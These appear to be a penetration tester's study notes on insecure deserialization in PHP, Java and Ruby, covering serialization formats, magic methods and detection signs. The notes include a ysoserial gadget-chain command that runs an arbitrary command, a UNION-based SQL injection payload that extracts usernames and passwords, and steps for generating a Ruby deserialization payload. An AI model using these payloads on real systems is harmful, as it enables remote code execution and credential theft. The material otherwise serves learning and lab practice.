Insecure Deserialization

** base64 encoding with delimiters \00 can also be used?

PHP

O:<char-length>:"<classname>":n:{s:n:"s":s:n:"s";s:n:"s":b:1} - methods serialize() unserialize() 0 == "passwordAbcd" 'True' Checks only the first character as integer. If no integer, 0 is considered the value. 9 == "a9sbv6bk2d9naeeoch2yffy2fp6zfz13" 'false' - Anatomy of a serialize()'ed value:

String
s:size:value;

Integer
i:value;

Boolean
b:value; (does not store "true" or "false", does store '1' or '0')

Null
N;

Array
a:size:{key definition;value definition;(repeated per element)}

Object
O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

String values are always in double quotes
Array keys are always integers or strings
"null => 'value'" equates to 's:0:"";s:5:"value";',
"true => 'value'" equates to 'i:1;s:5:"value";',
"false => 'value'" equates to 'i:0;s:5:"value";',
"array(whatever the contents) => 'value'" equates to an "illegal offset type" warning because you can't use an
array as a key; however, if you use a variable containing an array as a key, it will equate to 's:5:"Array";s:5:"value";',
and
attempting to use an object as a key will result in the same behavior as using an array will.

- Magic methods __construct __destruct __sleep (during serialization) __wakeup (during deserialization) - Gadget chain for Apache Commons java -jar ysoserial.jar CommonsCollections2 '<command>' | base64 | tr -d "\n" - Check stack trace for php framework versions {"token":"=","sig_hmac_sha1":""}

Java

starts with rO0 when object/string is converted to Base64 - class and methods java.io.Serializable writeObject() readObject() - Magic methods ObjectInputStream.readObject() - Universal Detection in any java version URLDNS chain triggers a DNS lookup - if the target JRE is not patched with JEP290 exploitation of RMI Registries - JRMPClient and JRMPListener - The transient keyword in Java is used to avoid serialization. If any object of a data structure is defined as a transient , then it will not be serialized. - The package name of the gadget class is present in the binary serialized object. - Postgresql Injection SELECT * FROM products WHERE id = '%s' LIMIT 1", id java PortswiggerGenericSD "' UNION SELECT '1','2','3',CAST((SELECT concat(username,':',password) from users LIMIT 1) as int),'5','6','7','8' --"

Python

Ruby

- Ruby on Rails framework Rails will automagically deserialize incoming requests that contain JSON or XML parameters. It does not do this for YAML, because it would be unsafe. However, the XML parser interprets elements in the form <foo type=“yaml”>…</foo> as YAML documents. - ROR Deserialization [ruby 2.0 - 2.5] https://www.elttam.com/blog/ruby-deserialization/#:~:text=GENERATING%20THE%20PAYLOAD 1. replace "id" in the above payload generating code. 2. ruby code.rb and copy the base64 code. 3. echo "<base64 code>" | tr -d "\n" 4. copy this code and url encode (or urlencode_not_plus) before placing in the serialized object - Marshal object # Run the below commands in terminal

irb
require "base64"
Base64.decode64("<base64 encoded marshal object>")
for e.g. "\x04\bo:\tUser\a:\x0E@usernameI\"\vwiener\x06:\x06EF:\x12@access_tokenI\"%izmzfgzfd1vx41d32kk3w5ig0ee5pzun\x06;\aF\n"